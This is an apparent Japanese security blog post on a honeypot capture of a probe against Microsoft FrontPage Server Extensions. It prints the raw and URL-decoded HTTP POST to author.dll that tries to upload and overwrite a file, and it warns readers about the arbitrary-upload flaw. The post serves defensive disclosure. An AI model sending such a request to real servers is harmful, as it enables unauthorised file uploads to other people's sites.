FrontPage Server Extensionsを狙った攻撃をキャッチ
ハニーポットに珍しいログを発見したので、ご紹介します。
捕まえたログはこんなんです。
POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 Accept: auth/sicily Cache-Control: no-cache Connection: close Content-Length: 194 Content-Type: application/x-vermeer-urlencoded Host: XXX.XXX.XXX.XXX Mime-Version: 1.0 User-Agent: core-project/1.0 X-Vermeer-Content-Type: application/x-vermeer-urlencoded method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dcore%2ehtml%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false core-project
なにやら"/vti_bin/vti_aut/author.dll"という見慣れないファイルへのアクセスですが、調べてみるとこれはMicrosoftのFrontPage Server Extensionsの設定ファイルでした。
FrontPage Server Extensionsって何?って思いましたが、CGIをIISで動作させるための拡張機能でした。
FrontPage Server Extensions は、Common Gateway Interface (CGI)、または、Internet Server Application Programming Interface (ISAPI) を使用します。Webの拡張機能を付けたいときに必要です。 FrontPage Server Extensionsって何?
POSTリクエストの部分をURLデコードするとこんな感じになります。
method=put document:4.0.2.4715&service_name=&document=[document_name=core.html;meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false core-project
下記サイトに記載されているアプリケーション脆弱性診断で使用するPythonのスクリプト例とほぼリクエストが合致するので、攻撃者も同様のスクリプトを用いて探索しているものと思われます。 vulners.com
上記リクエストではcore.htmlというファイルをアップロードでテストしているようです。
この脆弱性を使用すると任意のファイルをアップロードできるので、FrontPage Server Extensionsを使用されている方は注意が必要です。